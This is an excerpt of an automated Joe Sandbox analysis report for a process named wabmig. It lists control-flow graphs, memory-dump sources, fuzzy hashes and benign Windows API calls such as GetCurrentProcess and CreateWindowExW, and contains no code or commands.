26958025-2695802e 2407->2413 2413->2401 2415 26958034-26958066 2413->2415 2422 26958071-2695808d 2415->2422 2423 26958068-2695806c 2415->2423 2422->2387 2425 2695808f-269580e6 call 26956670 2422->2425 2423->2401 2424 2695806e 2423->2424 2424->2422 2425->2387 2451 2695831d-2695831f 2449->2451 2450->2451 2451->2383 2452 26958321-26958326 2451->2452 2453 26958334 2452->2453 2454 26958328-26958332 2452->2454 2455 26958339-2695833b 2453->2455 2454->2455 2455->2383 2456 2695833d-26958349 2455->2456 2456->2383
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $fq$$fq
                                        • API String ID: 0-2537786760
                                        • Opcode ID: 88f4415de0ca59b844ac443c8b7c410f13b356eaed16ee9ee483a7462eb5e738
                                        • Instruction ID: 47843427ff08337298d3537e11878a93bbf1c741b1c6682ac18aa8cd6be62690
                                        • Opcode Fuzzy Hash: 88f4415de0ca59b844ac443c8b7c410f13b356eaed16ee9ee483a7462eb5e738
                                        • Instruction Fuzzy Hash: 63028C34B002158BDB04DB69D694A9EB7E6FF84300F218969E806EB395DF35ED42CB90
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8045e2672d7196dd5ab815526f5e2e9f1f5cdcefd4fafce9efa40e8263cbd6d1
                                        • Instruction ID: 87e92b21b77c7f4aea2b3ab381d7f85ae2bcd48eacbdfdbabadfb74f96ff2085
                                        • Opcode Fuzzy Hash: 8045e2672d7196dd5ab815526f5e2e9f1f5cdcefd4fafce9efa40e8263cbd6d1
                                        • Instruction Fuzzy Hash: E9625C35B002058FDB14DB68C994A9DB7F6EF88310F2585A9E80AEB365DF35ED41CB90
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a737b5413b6288799d3067c0f4992ae6153d35995d45cc5336f59539060ac33f
                                        • Instruction ID: 9085899d8a227d6660604074b73fd744405d0ac3af8492e3c4d15e1d7cd332f3
                                        • Opcode Fuzzy Hash: a737b5413b6288799d3067c0f4992ae6153d35995d45cc5336f59539060ac33f
                                        • Instruction Fuzzy Hash: D0326B34B00209CFDB05DBA8D994A9DBBB6FB88310F218569E506EB355DF38ED41CB91
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0aa91405732f4422a7fc1b02ef1397eb2ff70de66664f6666b7bfe71e6eec518
                                        • Instruction ID: 8ed66f549ddbc7d3b95fd85eca2ea3097f8929350b26c8430272be1670aec13c
                                        • Opcode Fuzzy Hash: 0aa91405732f4422a7fc1b02ef1397eb2ff70de66664f6666b7bfe71e6eec518
                                        • Instruction Fuzzy Hash: 5A12F571F002159FDB10DB68C99065EB7BAEF84310F2184AAE94ADB396DF34ED45CB90

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 527 2695ad98-2695adb6 528 2695adb8-2695adbb 527->528 529 2695adbd-2695add9 528->529 530 2695adde-2695ade1 528->530 529->530 531 2695adf5-2695adf8 530->531 532 2695ade3-2695adf0 530->532 533 2695afb5-2695afbe 531->533 534 2695adfe-2695ae01 531->534 532->531 537 2695ae03-2695ae0c 533->537 539 2695afc4-2695afce 533->539 534->537 538 2695ae1b-2695ae1e 534->538 541 2695ae12-2695ae16 537->541 542 2695afcf-2695afdd 537->542 543 2695ae20-2695ae25 538->543 544 2695ae28-2695ae2b 538->544 541->538 556 2695af6c 542->556 557 2695afdf-2695b006 542->557 543->544 545 2695ae2d-2695ae31 544->545 546 2695ae3c-2695ae3f 544->546 545->539 548 2695ae37 545->548 549 2695ae41-2695ae4a 546->549 550 2695ae4f-2695ae52 546->550 548->546 549->550 551 2695ae54-2695ae67 550->551 552 2695ae6c-2695ae6e 550->552 551->552 554 2695ae75-2695ae78 552->554 555 2695ae70 552->555 554->528 559 2695ae7e-2695aea2 554->559 555->554 561 2695af7a-2695afab 556->561 560 2695b008-2695b00b 557->560 579 2695afb2 559->579 580 2695aea8-2695aeb7 559->580 562 2695b00d-2695b017 560->562 563 2695b018-2695b01b 560->563 561->579 565 2695b01d 563->565 566 2695b02a-2695b02d 563->566 652 2695b01d call 2695b2f0 565->652 653 2695b01d call 2695b300 565->653 568 2695b050-2695b053 566->568 569 2695b02f-2695b04b 566->569 570 2695b055-2695b059 568->570 571 2695b060-2695b063 568->571 569->568 576 2695b069-2695b0a4 570->576 577 2695b05b 570->577 571->576 578 2695b2cc-2695b2ce 571->578 573 2695b023-2695b025 573->566 589 2695b297-2695b2aa 576->589 590 2695b0aa-2695b0b6 576->590 577->571 582 2695b2d5-2695b2d8 578->582 583 2695b2d0 578->583 579->533 591 2695aecf-2695af0a call 26956670 580->591 592 2695aeb9-2695aebf 580->592 582->560 584 2695b2de-2695b2e8 582->584 583->582 595 2695b2ac 589->595 599 2695b0d6-2695b11a 590->599 600 2695b0b8-2695b0d1 590->600 610 2695af22-2695af39 591->610 611 2695af0c-2695af12 591->611 593 2695aec1 592->593 594 2695aec3-2695aec5 592->594 593->591 594->591 595->578 616 2695b136-2695b175 599->616 617 2695b11c-2695b12e 599->617 600->595 620 2695af51-2695af62 610->620 621 2695af3b-2695af41 610->621 612 2695af14 611->612 613 2695af16-2695af18 611->613 612->610 613->610 623 2695b25c-2695b271 616->623 624 2695b17b-2695b256 call 26956670 616->624 617->616 620->561 631 2695af64-2695af6a 620->631 625 2695af45-2695af47 621->625 626 2695af43 621->626 623->589 624->623 625->620 626->620 631->556 633 2695af6e-2695af70 631->633 633->561 652->573 653->573
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq
                                        • API String ID: 0-3929485403
                                        • Opcode ID: 24ddfe61e8d0add0db5e37254ef013231c11426dc35e6cae2d157866fa4495ea
                                        • Instruction ID: 8d5829f4c27ebd28eaae41552143f7ea28ede32359f5516aa3729e75d8871d49
                                        • Opcode Fuzzy Hash: 24ddfe61e8d0add0db5e37254ef013231c11426dc35e6cae2d157866fa4495ea
                                        • Instruction Fuzzy Hash: 58E18F70E102098FCB15DFA8D5906AEB7B6FF84300F218569E80AAB359DF349D46CB95

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1408 26933210-2693329f GetCurrentProcess 1412 269332a1-269332a7 1408->1412 1413 269332a8-269332dc GetCurrentThread 1408->1413 1412->1413 1414 269332e5-26933319 GetCurrentProcess 1413->1414 1415 269332de-269332e4 1413->1415 1417 26933322-2693333d call 269333e0 1414->1417 1418 2693331b-26933321 1414->1418 1415->1414 1420 26933343-26933372 GetCurrentThreadId 1417->1420 1418->1417 1422 26933374-2693337a 1420->1422 1423 2693337b-269333dd 1420->1423 1422->1423
                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 2693328E
                                        • GetCurrentThread.KERNEL32 ref: 269332CB
                                        • GetCurrentProcess.KERNEL32 ref: 26933308
                                        • GetCurrentThreadId.KERNEL32 ref: 26933361
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947065548.0000000026930000.00000040.00000800.00020000.00000000.sdmp, Offset: 26930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26930000_wabmig.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID:
                                        • API String ID: 2063062207-0
                                        • Opcode ID: 3ba6c8ac34ba326cad416570df07dad7f7327a00578a813cf552ad874de49002
                                        • Instruction ID: e3e92e77d9335fe7e0fd9b1238ecdab6191b4bf82f382eca2f0a86abc32a3bfb
                                        • Opcode Fuzzy Hash: 3ba6c8ac34ba326cad416570df07dad7f7327a00578a813cf552ad874de49002
                                        • Instruction Fuzzy Hash: DC5125B09013498FDB18DFAAC988B9EBBF6BF88314F248559E419A7350DB345940CB65

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1386 2693320b-2693329f GetCurrentProcess 1390 269332a1-269332a7 1386->1390 1391 269332a8-269332dc GetCurrentThread 1386->1391 1390->1391 1392 269332e5-26933319 GetCurrentProcess 1391->1392 1393 269332de-269332e4 1391->1393 1395 26933322-2693333d call 269333e0 1392->1395 1396 2693331b-26933321 1392->1396 1393->1392 1398 26933343-26933372 GetCurrentThreadId 1395->1398 1396->1395 1400 26933374-2693337a 1398->1400 1401 2693337b-269333dd 1398->1401 1400->1401
                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 2693328E
                                        • GetCurrentThread.KERNEL32 ref: 269332CB
                                        • GetCurrentProcess.KERNEL32 ref: 26933308
                                        • GetCurrentThreadId.KERNEL32 ref: 26933361
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947065548.0000000026930000.00000040.00000800.00020000.00000000.sdmp, Offset: 26930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26930000_wabmig.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID:
                                        • API String ID: 2063062207-0
                                        • Opcode ID: dafeebcca5651396c843553f4ca021e9cc447a0a19199781f229009e9623bf91
                                        • Instruction ID: dbc917425d855dc05e1093280afbf9d951c4d4340e1bd74e67cceaa3d0b6c121
                                        • Opcode Fuzzy Hash: dafeebcca5651396c843553f4ca021e9cc447a0a19199781f229009e9623bf91
                                        • Instruction Fuzzy Hash: 995125B0D013498FDB18DFA9C988B9EBBF6FF88314F248559E419A7350DB349940CB65

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1430 26959210-26959235 1431 26959237-2695923a 1430->1431 1432 26959260-26959263 1431->1432 1433 2695923c-2695925b 1431->1433 1434 26959b23-26959b25 1432->1434 1435 26959269-2695927e 1432->1435 1433->1432 1437 26959b27 1434->1437 1438 26959b2c-26959b2f 1434->1438 1442 26959296-269592ac 1435->1442 1443 26959280-26959286 1435->1443 1437->1438 1438->1431 1440 26959b35-26959b3f 1438->1440 1447 269592b7-269592b9 1442->1447 1444 26959288 1443->1444 1445 2695928a-2695928c 1443->1445 1444->1442 1445->1442 1448 269592d1-26959342 1447->1448 1449 269592bb-269592c1 1447->1449 1460 26959344-26959367 1448->1460 1461 2695936e-2695938a 1448->1461 1450 269592c5-269592c7 1449->1450 1451 269592c3 1449->1451 1450->1448 1451->1448 1460->1461 1466 269593b6-269593d1 1461->1466 1467 2695938c-269593af 1461->1467 1472 269593d3-269593f5 1466->1472 1473 269593fc-26959417 1466->1473 1467->1466 1472->1473 1478 26959442-2695944c 1473->1478 1479 26959419-2695943b 1473->1479 1480 2695945c-269594d6 1478->1480 1481 2695944e-26959457 1478->1481 1479->1478 1487 26959523-26959538 1480->1487 1488 269594d8-269594f6 1480->1488 1481->1440 1487->1434 1492 26959512-26959521 1488->1492 1493 269594f8-26959507 1488->1493 1492->1487 1492->1488 1493->1492
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $fq$$fq$$fq$$fq
                                        • API String ID: 0-2113499236
                                        • Opcode ID: e851f503ce541d7f43eeb2b51b3b3f5742068bccb321f3c006d33a169e6c237e
                                        • Instruction ID: a30825b868e16fbdc428e9f0c3932ebeafdf700020f622f00b925ce78ecccc33
                                        • Opcode Fuzzy Hash: e851f503ce541d7f43eeb2b51b3b3f5742068bccb321f3c006d33a169e6c237e
                                        • Instruction Fuzzy Hash: 22914F34F0021A8FDB55DB68C9907AE73F6FF89200F2185A9D409AB358EE349D428B91

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1496 2695d008-2695d023 1497 2695d025-2695d028 1496->1497 1498 2695d071-2695d074 1497->1498 1499 2695d02a-2695d06c 1497->1499 1500 2695d076-2695d0b8 1498->1500 1501 2695d0bd-2695d0c0 1498->1501 1499->1498 1500->1501 1502 2695d0c2-2695d0c4 1501->1502 1503 2695d0cf-2695d0d2 1501->1503 1505 2695d3af-2695d3b8 1502->1505 1506 2695d0ca 1502->1506 1507 2695d0d4-2695d0e3 1503->1507 1508 2695d11b-2695d11e 1503->1508 1510 2695d3c7-2695d3d3 1505->1510 1511 2695d3ba-2695d3bf 1505->1511 1506->1503 1512 2695d0e5-2695d0ea 1507->1512 1513 2695d0f2-2695d0fe 1507->1513 1514 2695d167-2695d16a 1508->1514 1515 2695d120-2695d162 1508->1515 1517 2695d4e4-2695d4e9 1510->1517 1518 2695d3d9-2695d3ed 1510->1518 1511->1510 1512->1513 1519 2695da25-2695da3a 1513->1519 1520 2695d104-2695d116 1513->1520 1521 2695d174-2695d177 1514->1521 1522 2695d16c-2695d171 1514->1522 1515->1514 1537 2695d4f1 1517->1537 1518->1537 1538 2695d3f3-2695d405 1518->1538 1542 2695da3b 1519->1542 1520->1508 1525 2695d1c0-2695d1c3 1521->1525 1526 2695d179-2695d1bb 1521->1526 1522->1521 1529 2695d1c5-2695d1db 1525->1529 1530 2695d1e0-2695d1e3 1525->1530 1526->1525 1529->1530 1539 2695d1e5-2695d227 1530->1539 1540 2695d22c-2695d22f 1530->1540 1545 2695d4f4-2695d500 1537->1545 1561 2695d407-2695d40d 1538->1561 1562 2695d429-2695d42b 1538->1562 1539->1540 1544 2695d235-2695d238 1540->1544 1540->1545 1542->1542 1547 2695da3c 1542->1547 1552 2695d281-2695d284 1544->1552 1553 2695d23a-2695d27c 1544->1553 1545->1507 1554 2695d506-2695d7f3 1545->1554 1547->1542 1548 2695da3e-2695da5e 1547->1548 1558 2695da60-2695da63 1548->1558 1559 2695d286-2695d2c8 1552->1559 1560 2695d2cd-2695d2d0 1552->1560 1553->1552 1711 2695d7f9-2695d7ff 1554->1711 1712 2695da1a-2695da24 1554->1712 1567 2695da65 call 2695db7d 1558->1567 1568 2695da72-2695da75 1558->1568 1559->1560 1569 2695d2f3-2695d2f6 1560->1569 1570 2695d2d2-2695d2ee 1560->1570 1572 2695d411-2695d41d 1561->1572 1573 2695d40f 1561->1573 1566 2695d435-2695d441 1562->1566 1597 2695d443-2695d44d 1566->1597 1598 2695d44f 1566->1598 1592 2695da6b-2695da6d 1567->1592 1579 2695da77-2695da93 1568->1579 1580 2695da98-2695da9b 1568->1580 1576 2695d33f-2695d342 1569->1576 1577 2695d2f8-2695d33a 1569->1577 1570->1569 1578 2695d41f-2695d427 1572->1578 1573->1578 1590 2695d344-2695d346 1576->1590 1591 2695d351-2695d354 1576->1591 1577->1576 1578->1566 1579->1580 1593 2695da9d-2695dac9 1580->1593 1594 2695dace-2695dad0 1580->1594 1590->1537 1599 2695d34c 1590->1599 1600 2695d356-2695d365 1591->1600 1601 2695d39d-2695d39f 1591->1601 1592->1568 1593->1594 1604 2695dad7-2695dada 1594->1604 1605 2695dad2 1594->1605 1611 2695d454-2695d456 1597->1611 1598->1611 1599->1591 1613 2695d374-2695d380 1600->1613 1614 2695d367-2695d36c 1600->1614 1615 2695d3a6-2695d3a9 1601->1615 1616 2695d3a1 1601->1616 1604->1558 1606 2695dadc-2695daeb 1604->1606 1605->1604 1626 2695db52-2695db67 1606->1626 1627 2695daed-2695db50 call 26956670 1606->1627 1611->1537 1618 2695d45c-2695d478 call 26956670 1611->1618 1613->1519 1620 2695d386-2695d398 1613->1620 1614->1613 1615->1497 1615->1505 1616->1615 1642 2695d487-2695d493 1618->1642 1643 2695d47a-2695d47f 1618->1643 1620->1601 1627->1626 1642->1517 1646 2695d495-2695d4e2 1642->1646 1643->1642 1646->1537 1713 2695d801-2695d806 1711->1713 1714 2695d80e-2695d817 1711->1714 1713->1714 1714->1519 1715 2695d81d-2695d830 1714->1715 1717 2695d836-2695d83c 1715->1717 1718 2695da0a-2695da14 1715->1718 1719 2695d83e-2695d843 1717->1719 1720 2695d84b-2695d854 1717->1720 1718->1711 1718->1712 1719->1720 1720->1519 1721 2695d85a-2695d87b 1720->1721 1724 2695d87d-2695d882 1721->1724 1725 2695d88a-2695d893 1721->1725 1724->1725 1725->1519 1726 2695d899-2695d8b6 1725->1726 1726->1718 1729 2695d8bc-2695d8c2 1726->1729 1729->1519 1730 2695d8c8-2695d8e1 1729->1730 1732 2695d8e7-2695d90e 1730->1732 1733 2695d9fd-2695da04 1730->1733 1732->1519 1736 2695d914-2695d91e 1732->1736 1733->1718 1733->1729 1736->1519 1737 2695d924-2695d93b 1736->1737 1739 2695d93d-2695d948 1737->1739 1740 2695d94a-2695d965 1737->1740 1739->1740 1740->1733 1745 2695d96b-2695d984 call 26956670 1740->1745 1749 2695d986-2695d98b 1745->1749 1750 2695d993-2695d99c 1745->1750 1749->1750 1750->1519 1751 2695d9a2-2695d9f6 1750->1751 1751->1733
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $fq$$fq$$fq
                                        • API String ID: 0-837900676
                                        • Opcode ID: b48ce955d9e099c9fa5c95b0dccfd6d30bb32ab8c5867fdf6e9fe61e607469b4
                                        • Instruction ID: 7258359b6d988a263153410f221eb667ae71cf48894ae64e8f94ce9825c8a7a1
                                        • Opcode Fuzzy Hash: b48ce955d9e099c9fa5c95b0dccfd6d30bb32ab8c5867fdf6e9fe61e607469b4
                                        • Instruction Fuzzy Hash: 8F625E30A002068FCB19DF68D590A4EB7B6FF85300F219A69E405AF365DF35ED86CB95

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1759 26954c68-26954c8c 1760 26954c8e-26954c91 1759->1760 1761 26954c93-26954cad 1760->1761 1762 26954cb2-26954cb5 1760->1762 1761->1762 1763 26955394-26955396 1762->1763 1764 26954cbb-26954db3 1762->1764 1766 2695539d-269553a0 1763->1766 1767 26955398 1763->1767 1782 26954e36-26954e3d 1764->1782 1783 26954db9-26954e01 1764->1783 1766->1760 1769 269553a6-269553b3 1766->1769 1767->1766 1784 26954ec1-26954eca 1782->1784 1785 26954e43-26954eb3 1782->1785 1805 26954e06 call 26955511 1783->1805 1806 26954e06 call 26955520 1783->1806 1784->1769 1802 26954eb5 1785->1802 1803 26954ebe 1785->1803 1796 26954e0c-26954e28 1799 26954e33-26954e34 1796->1799 1800 26954e2a 1796->1800 1799->1782 1800->1799 1802->1803 1803->1784 1805->1796 1806->1796
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: fkq$XPkq$\Okq
                                        • API String ID: 0-673657909
                                        • Opcode ID: 967b01cfd65ab99545927de00431686fdbbc454e158e19866296d7f2edf51df5
                                        • Instruction ID: a2e2ab149c43b0e4e5856f211d9a8ed2ea04ddf3d16b905e1ac908e490d6cc0b
                                        • Opcode Fuzzy Hash: 967b01cfd65ab99545927de00431686fdbbc454e158e19866296d7f2edf51df5
                                        • Instruction Fuzzy Hash: CF617070F002189FDB55DFA8C8547AEBBF6EF88300F208469E506AB395DF755C458B90

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2654 26959200-26959235 2656 26959237-2695923a 2654->2656 2657 26959260-26959263 2656->2657 2658 2695923c-2695925b 2656->2658 2659 26959b23-26959b25 2657->2659 2660 26959269-2695927e 2657->2660 2658->2657 2662 26959b27 2659->2662 2663 26959b2c-26959b2f 2659->2663 2667 26959296-269592ac 2660->2667 2668 26959280-26959286 2660->2668 2662->2663 2663->2656 2665 26959b35-26959b3f 2663->2665 2672 269592b7-269592b9 2667->2672 2669 26959288 2668->2669 2670 2695928a-2695928c 2668->2670 2669->2667 2670->2667 2673 269592d1-26959342 2672->2673 2674 269592bb-269592c1 2672->2674 2685 26959344-26959367 2673->2685 2686 2695936e-2695938a 2673->2686 2675 269592c5-269592c7 2674->2675 2676 269592c3 2674->2676 2675->2673 2676->2673 2685->2686 2691 269593b6-269593d1 2686->2691 2692 2695938c-269593af 2686->2692 2697 269593d3-269593f5 2691->2697 2698 269593fc-26959417 2691->2698 2692->2691 2697->2698 2703 26959442-2695944c 2698->2703 2704 26959419-2695943b 2698->2704 2705 2695945c-269594d6 2703->2705 2706 2695944e-26959457 2703->2706 2704->2703 2712 26959523-26959538 2705->2712 2713 269594d8-269594f6 2705->2713 2706->2665 2712->2659 2717 26959512-26959521 2713->2717 2718 269594f8-26959507 2713->2718 2717->2712 2717->2713 2718->2717
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $fq$$fq
                                        • API String ID: 0-2537786760
                                        • Opcode ID: c8a6c7cbbef1dee2b7d2d969d23ab83ec6a85e9502db36f697b0b5a751cdf702
                                        • Instruction ID: 96c655cf851b7f422cf9118020eb1e56998f7aa945bfed8a4cb43c59b398166a
                                        • Opcode Fuzzy Hash: c8a6c7cbbef1dee2b7d2d969d23ab83ec6a85e9502db36f697b0b5a751cdf702
                                        • Instruction Fuzzy Hash: 4B515234B002169FEB15DB68D990BAE73F6FB89300F118569E509EB358EE34DD428B91

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2721 26954c59-26954c8c 2722 26954c8e-26954c91 2721->2722 2723 26954c93-26954cad 2722->2723 2724 26954cb2-26954cb5 2722->2724 2723->2724 2725 26955394-26955396 2724->2725 2726 26954cbb-26954db3 2724->2726 2728 2695539d-269553a0 2725->2728 2729 26955398 2725->2729 2744 26954e36-26954e3d 2726->2744 2745 26954db9-26954e01 2726->2745 2728->2722 2731 269553a6-269553b3 2728->2731 2729->2728 2746 26954ec1-26954eca 2744->2746 2747 26954e43-26954eb3 2744->2747 2767 26954e06 call 26955511 2745->2767 2768 26954e06 call 26955520 2745->2768 2746->2731 2764 26954eb5 2747->2764 2765 26954ebe 2747->2765 2758 26954e0c-26954e28 2761 26954e33-26954e34 2758->2761 2762 26954e2a 2758->2762 2761->2744 2762->2761 2764->2765 2765->2746 2767->2758 2768->2758
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: fkq$XPkq
                                        • API String ID: 0-3439102645
                                        • Opcode ID: 8b67addcba21cb51136f1013a54ea62ba3811182e7bde610e236cc476fa42285
                                        • Instruction ID: 459b6ef05fa0fc92203b807a9475bb9e9ffb169bc5f41ca0386a6c07d881b6ea
                                        • Opcode Fuzzy Hash: 8b67addcba21cb51136f1013a54ea62ba3811182e7bde610e236cc476fa42285
                                        • Instruction Fuzzy Hash: B7514D70F002189FDB55DFA9C854BAEBBF6EF88700F208529E505AB395DE759C05CB90
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2927964162.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26d0000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 45aa39aed41d8b3aa4d430822cb8b2781d9d52b56f2737c5c1bb91da041e45f8
                                        • Instruction ID: 3cf3970cbc3b39ca0111ab246695545026109b2bc23bdcac974abb88a13df7a4
                                        • Opcode Fuzzy Hash: 45aa39aed41d8b3aa4d430822cb8b2781d9d52b56f2737c5c1bb91da041e45f8
                                        • Instruction Fuzzy Hash: 4041F371D0438A8FCB14DF69D8042AABBF1AF89210F1585AAD508E7341DB349845CB91
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 2693D902
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947065548.0000000026930000.00000040.00000800.00020000.00000000.sdmp, Offset: 26930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26930000_wabmig.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0
                                        • Opcode ID: e393f5d4e775cc9437b183b32e6ae83bc952d770a5a772f935f2a1cb0e2969f6
                                        • Instruction ID: 1e368a06e0c6c0365b3036c09a82d913d996bd79e2195f5a04aa684b3141fb7e
                                        • Opcode Fuzzy Hash: e393f5d4e775cc9437b183b32e6ae83bc952d770a5a772f935f2a1cb0e2969f6
                                        • Instruction Fuzzy Hash: B551D2B1D00349DFDB14CFA9C994ADEBBB5BF48310F24812AE818AB254D7719945CF90
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 2693D902
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947065548.0000000026930000.00000040.00000800.00020000.00000000.sdmp, Offset: 26930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26930000_wabmig.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0
                                        • Opcode ID: 75e355f1bd50bd9eac301a9dc26a3ea521408abc8fec9a622594cd3bf07015f7
                                        • Instruction ID: 86dc79fae8c56bbfb139ca649eedb80b40641c5d56850555f484b806476aaf1f
                                        • Opcode Fuzzy Hash: 75e355f1bd50bd9eac301a9dc26a3ea521408abc8fec9a622594cd3bf07015f7
                                        • Instruction Fuzzy Hash: 1B41C3B1D00309DFDB14CF99C894ADEFBB5BF48310F24812AE818AB254D7719845CF90
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 269334DF
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947065548.0000000026930000.00000040.00000800.00020000.00000000.sdmp, Offset: 26930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26930000_wabmig.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 1fecb35e163983c5539fd9ef1ce0710307f178b2e274f312dd33d8624d602dd9
                                        • Instruction ID: bfaa6887f922c90b8fe396226e2a8a8974bfcba8d6781c1433859fdcb540ada8
                                        • Opcode Fuzzy Hash: 1fecb35e163983c5539fd9ef1ce0710307f178b2e274f312dd33d8624d602dd9
                                        • Instruction Fuzzy Hash: B32105B5D00249AFDB10CFAAD984ADEFBF8EB48320F14801AE915A7350D375A950CFA1
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 269334DF
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947065548.0000000026930000.00000040.00000800.00020000.00000000.sdmp, Offset: 26930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26930000_wabmig.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: ff81c5feb913b146b89035c4b54396d8e25171ac9f629032d069c8b50ac06086
                                        • Instruction ID: 97112e3fdc7460fb1795fa359277d4df74c42cc747ce560f96e33ec0a7f90e6c
                                        • Opcode Fuzzy Hash: ff81c5feb913b146b89035c4b54396d8e25171ac9f629032d069c8b50ac06086
                                        • Instruction Fuzzy Hash: C721F8B5D002499FDB10CF9AD984ADEFFF4EB48320F14801AE914A3310D775A950CF60
                                        APIs
                                        • GlobalMemoryStatusEx.KERNEL32 ref: 026DE947
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2927964162.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26d0000_wabmig.jbxd
                                        Similarity
                                        • API ID: GlobalMemoryStatus
                                        • String ID:
                                        • API String ID: 1890195054-0
